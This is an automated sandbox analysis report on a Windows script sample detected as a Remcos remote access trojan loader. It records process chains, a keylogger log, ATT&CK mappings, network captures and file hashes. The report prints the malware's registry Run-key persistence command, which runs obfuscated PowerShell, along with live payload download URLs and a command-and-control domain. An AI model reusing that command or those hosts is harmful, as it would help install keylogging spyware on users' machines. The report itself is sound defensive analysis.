              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerrs
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerD
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerEM
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managernet/s
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager_sE
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager}s'
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerLs6
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager sB
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager5
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managernet/
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.0000000003142000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/04/20 16:05:48 Program Manager]
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerds
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerc300cfO
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerxs
              Source: wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.0000000003142000.00000004.00000020.00020000.00000000.sdmp, mvourhjs.dat.10.dr Binary or memory string: [2024/04/20 16:05:42 Program Manager]
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003157000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerKs)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

Source: Yara match | File source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              Remote Access Functionality

Source: Yara match | File source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 22 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 22 Scripting | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 11 Input Capture | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 112 Process Injection | 1 Software Packing | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 11 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 11 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Masquerading | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Modify Registry | LSA Secrets | 41 Virtualization/Sandbox Evasion | SSH | Keylogging | 212 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 41 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 112 Process Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
[Behavior graph (image not reproduced). Behavior Graph ID: 1429076; Sample: rOferta_SKGNMECLemnedefinit...; Startdate: 20/04/2024; Architecture: WINDOWS; Score: 100]
Process chain: wscript.exe started powershell.exe; that powershell.exe started a second powershell.exe, conhost.exe and cmd.exe; the second powershell.exe started wab.exe and cmd.exe; wab.exe started cmd.exe, which started conhost.exe and reg.exe.
Network: the first powershell.exe contacted 87.121.105.163 (port 80, NET1-ASBG, Bulgaria); wab.exe contacted jgbours284hawara01.duckdns.org at 45.88.90.110 (port 3050, LVLT-10753US, Bulgaria) and geoplugin.net at 178.237.33.50 (port 80, ATOM86-ASATOM86NL, Netherlands).
Dropped file: wab.exe dropped C:\Users\user\AppData\Roaming\mvourhjs.dat (data).
Signatures shown on the graph: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; Uses dynamic DNS services (jgbours284hawara01.duckdns.org); VBScript performs obfuscated calls to suspicious functions, Suspicious powershell command line found, Wscript starts Powershell (via cmd or directly) (wscript.exe); Very long command line found, Found suspicious powershell code related to unpacking or dynamic code loading (powershell.exe); Writes to foreign memory regions (second powershell.exe); Installs a global keyboard hook (wab.exe).

Source | Detection | Scanner | Label
rOferta_SKGNMECLemnedefinitionen353523577.wsf | 12% | Virustotal
rOferta_SKGNMECLemnedefinitionen353523577.wsf | 8% | ReversingLabs | Win32.Trojan.Generic

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
jgbours284hawara01.duckdns.org | 7% | Virustotal
geoplugin.net | 4% | Virustotal

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
https://contoso.com/ | 0% | URL Reputation | safe
jgbours284hawara01.duckdns.org | 7% | Virustotal
http://87.121.105.163 | 17% | Virustotal
http://geoplugin.net/json.gpw | 0% | Virustotal
http://87.121.105.163/Belyves242.hhk | 15% | Virustotal
http://geoplugin.net/ | 4% | Virustotal
http://geoplugin.net/json.gpg | 0% | Virustotal

Name | IP | Active | Malicious | Antivirus Detection | Reputation
jgbours284hawara01.duckdns.org | 45.88.90.110 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
jgbours284hawara01.duckdns.org | true | | unknown
http://87.121.105.163/Belyves242.hhk | false | | unknown
http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin | false | | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
87.121.105.163 | unknown | Bulgaria | 43561 | NET1-ASBG | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
45.88.90.110 | jgbours284hawara01.duckdns.org | Bulgaria | 10753 | LVLT-10753US | true

                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1429076
                                            Start date and time:2024-04-20 16:04:10 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 35s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:15
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:rOferta_SKGNMECLemnedefinitionen353523577.wsf
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.expl.evad.winWSF@17/9@2/3
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 75%
                                            • Number of executed functions: 45
                                            • Number of non-executed functions: 3
                                            Cookbook Comments:
                                            • Found application associated with file extension: .wsf
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 1492 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 6256 because it is empty
                                            • Execution Graph export aborted for target wab.exe, PID 5776 because there are no executed function
                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
16:05:04 | API Interceptor | 129x Sleep call for process: powershell.exe modified
16:05:38 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run nyerhvervelsen %Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)
16:05:46 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run nyerhvervelsen %Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)
16:06:11 | API Interceptor | 6089821x Sleep call for process: wab.exe modified
                                            AWB DOCUMENT.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5Get hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            No context
                                            No context
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):963
                                            Entropy (8bit):4.995620093649274
                                            Encrypted:false
                                            SSDEEP:12:tklzTknd6CsGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7Rr:qlkdRNuKyGX855vXhNlT3/77Kdxtro
                                            MD5:334018F02CE31BCBB4864D602B557FE5
                                            SHA1:C6DE43E8D6B5C026C0B0A56A898A3F00B282B881
                                            SHA-256:F70CE925C3923E25A5ADB7089E7EE752E771FBD073888ABFC426138C9094F1B3
                                            SHA-512:31EF486A2F75226594BC553CBAFA84B645B6ED456F35F363C8EFD6229F4A731981CA1B7736CD4BD739DDCA885F068E96692BB16C7A906314B52220DC63E318BB
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:{. "geoplugin_request":"81.181.57.52",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Marietta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"34.0414",. "geoplugin_longitude":"-84.5053",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):11608
                                            Entropy (8bit):4.886255615007755
                                            Encrypted:false
                                            SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                            MD5:C7F7A26360E678A83AFAB85054B538EA
                                            SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                            SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                            SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllulbnolz:NllUc
                                            MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                            Malicious:false
                                            Preview:@...e................................................@..........
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):410244
                                            Entropy (8bit):5.9770548026443935
                                            Encrypted:false
                                            SSDEEP:12288:ajrzDp7+/4As4EauWvq2IvXvuE1XFGu1Rxa5yy:MB7+/aauWi2OXvucVGsGN
                                            MD5:AA8E1FF80B164E8028DFA9321E7A95A2
                                            SHA1:F9B328C860083A3784219725EBD5690F5BA19027
                                            SHA-256:AF2499C512C0A15453EB4E7FFE57AAE14170E7A88CEE0524A555BF65094B8018
                                            SHA-512:FAC9F4E7C72B274E55EF2925D4BE08F3C6DE4798DAF561433131CA47BA54DBC3D826E59130213F39487D46FC72BE0B44F0981D389A87B1D9B6C1C8AB54D2431D
                                            Malicious:false
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):394
                                            Entropy (8bit):3.3492543389610163
                                            Encrypted:false
                                            SSDEEP:12:6lnpNWWqecmlnpNWWalnpNW2bWFe5UlnpNWrlnpNWcbW+:6lpNWgcmlpNWblpNWyWqUlpNWrlpNWo5
                                            MD5:7D56EFE1C932D82F837D3AE2E5E94BA8
                                            SHA1:B846E1EBC341B33865C49EA9131A44E9FCC8AF95
                                            SHA-256:305DE02AE57C93DC8DD3F6A2A313B1438F005BA6BD8A830D6103C96D79FF931F
                                            SHA-512:71A703FEAB7ACC353B5CEE542A5852EB6F580544D3CC195A4429AAD6F913F4186BED9AC00D1F59942CA6E51F23CDB66C05DE72AB31EDBC3930D1FD77723B7080
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mvourhjs.dat, Author: Joe Security
                                            Preview:....[.2.0.2.4./.0.4./.2.0. .1.6.:.0.5.:.3.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.4./.2.0. .1.6.:.0.5.:.3.9. .R.u.n.].........[.2.0.2.4./.0.4./.2.0. .1.6.:.0.5.:.4.2. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.0.4./.2.0. .1.6.:.0.5.:.4.6. .R.u.n.].........[.2.0.2.4./.0.4./.2.0. .1.6.:.0.5.:.4.8. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                            File type:XML 1.0 document, ASCII text, with very long lines (336), with CRLF line terminators
                                            Entropy (8bit):5.189067985250855
                                            TrID:
                                            • Generic XML (ASCII) (5005/1) 100.00%
                                            File name:rOferta_SKGNMECLemnedefinitionen353523577.wsf
                                            File size:17'539 bytes
                                            MD5:ed7122bfc1517425a483908cff86d950
                                            SHA1:d71986894ac69f6958f3e126bec9eaabea50fa5c
                                            SHA256:813142e22c4d2a79a49e1f96a9bea8b14e13a67eb9d35922b5ac0b88b33aec6a
                                            SHA512:2fae96a3d31de6195ddf196d1b4abd2c1a7564347805838f701e328ef2a823462c45d09232d7ddecd7bacacec5652808194e77c2f8f674d06cc4a61a34976636
                                            SSDEEP:384:vxuMLgrXuO5tyVsCouP+fVMD0BoqPrLjibxqWW4ZxQbIeMgJQc+Nzuz:vxtVOvyn3P+fC6fXji3+MNS
                                            TLSH:33725CA5EAC609A2CECB2345F459CA40CC2044DD4C566A5A7F85C74E343B568E3EFE4F
                                            File Content Preview:<?xml version="1.0" ?>..<job id="@JOB_ID@">..<script ..language="VBScript">..' <![CDATA[....'Kmpehjens vinnas blepharoptosis? interpolater..'Froes dispensaten..'Sensoriglandular. arbejdsfil husums28 anticiperet222..'Avocative? ugleredes, rudderpost utm
                                            Icon Hash:68d69b8f86ab9a86
                                            Document Type:Text
                                            Number of OLE Files:1
                                            Has Summary Info:
                                            Application Name:
                                            Encrypted Document:False
                                            Contains Word Document Stream:False
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:False
                                            Flash Objects Count:0
                                            Contains VBA Macros:True
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/20/24-16:05:40.186650 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49720 | 3050 | 192.168.2.6 | 45.88.90.110
04/20/24-16:07:49.852728 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 3050 | 49720 | 45.88.90.110 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Apr 20, 2024 16:05:07.373250008 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373312950 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373373985 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373435974 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373529911 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373595953 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373614073 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373636007 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373655081 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373671055 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373672962 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373699903 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373718977 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373733997 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373735905 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373754025 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373771906 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373783112 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373790979 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373806953 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373820066 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373823881 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373846054 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373851061 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373878956 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373897076 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.373903990 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.373940945 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374068975 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374085903 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374102116 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374119997 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374136925 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374138117 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374155998 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374166965 CEST4971080192.168.2.687.121.105.163
                                            Apr 20, 2024 16:05:07.374172926 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374191046 CEST804971087.121.105.163192.168.2.6
                                            Apr 20, 2024 16:05:07.374201059 CEST4971080192.168.2.687.121.105.163
